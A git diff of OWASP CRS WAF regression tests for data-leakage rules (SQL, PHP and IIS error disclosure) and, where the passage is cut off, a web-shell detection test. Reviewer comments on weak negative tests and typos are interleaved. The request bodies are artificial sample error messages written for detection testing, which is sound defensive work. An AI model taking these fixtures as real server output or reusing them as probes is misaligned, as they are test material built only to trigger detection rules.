@@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" - description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log: + expect_ids: [951230] + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: 
"/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log: + expect_ids: [951230] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd171..802915fd3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml 
@@ -1,49 +1,47 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" - description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} + output: + log: + expect_ids: [951240] + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log: + expect_ids: [951240] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff813..ebc1c439d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" - description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log: + expect_ids: [951250] diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f93739f..852a60793 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" - description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log: + expect_ids: [951260] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e5c..18149c32e 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml 
@@ -1,107 +1,105 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" - description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + log: + no_expect_ids: [953100] + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + log: + no_expect_ids: [953100] + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + log: + no_expect_ids: [953100] + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + log: + no_expect_ids: [953100] + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + log: + no_expect_ids: [953100] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f04..abb4ceb62 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml 
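Review bot: All five negative tests in this hunk send their sample phrases to `uri: "/post"` with `Content-Type: "text/plain"`, whereas the positive tests for the PL2 sibling rule 953101 push the same phrases through `uri: "/reflect"` inside a JSON body; if `/post` does not echo the request body back into the response, a RESPONSE-phase rule never sees the phrase and `no_expect_ids: [953100]` holds no matter what the rule's pattern does, so these false-positive guards could not catch a regression. I would switch each test to `uri: "/reflect"`, `Content-Type: "application/json"` and `data: |-` with `{"body": "..."}` so the assertion actually exercises the response body, and confirm with a deliberately broken pattern that at least one of them fails. Separately, the description of test 5 has a typo and an unbalanced quote; `desc: "'cannot be empty' is too common for PL1, GH issue #3399"` reads cleanly.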
@@ -1,112 +1,110 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" - description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log: + expect_ids: [953101] + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS 
test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log: + expect_ids: [953101] + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log: + expect_ids: [953101] + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static 
function"} - output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log: + expect_ids: [953101] + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log: + expect_ids: [953101] diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a47..ddcfda844 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml 
@@ -1,151 +1,149 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" - description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log: + expect_ids: [953120] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c6f..fb954c0ef 100644 
--- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" - description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log: + expect_ids: [954100] diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a45..f13c4f303 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml 
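Review bot: The `data` value on the new side of this hunk keeps the double-quoted form with stacked escapes (`"{\"body\": \"C:\\\\inetpub \\n\"}"`), while the sibling files converted in this commit (953101, 954120) carry the JSON body in a `|-` block scalar that yields the same bytes without the escape layering. For consistency and easier review of what the reflected body actually contains, consider `data: |-` followed by `{"body": "C:\\inetpub \n"}`. The same applies to the single-line `data` strings kept in 955260 and 959100.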
@@ -1,45 +1,44 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" - description: "Tests for rule 954120 - IIS Error information disclusure" + description: "IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log: + expect_ids: [954120] + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log: + expect_ids: [954120] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d0b..eb0f78400 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,68 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" - description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "
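Review bot: The added meta line carries a typo, `description: "IIS Error information disclusure"`; since this line is new in the commit it should read `description: "IIS Error information disclosure"`. Both tests also keep the identical `desc: 'Match IIS error page'`, which makes a failure report ambiguous now that the `test_title` values are gone; naming the status code each one exercises (404.14 and 500.15 respectively) would distinguish them.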

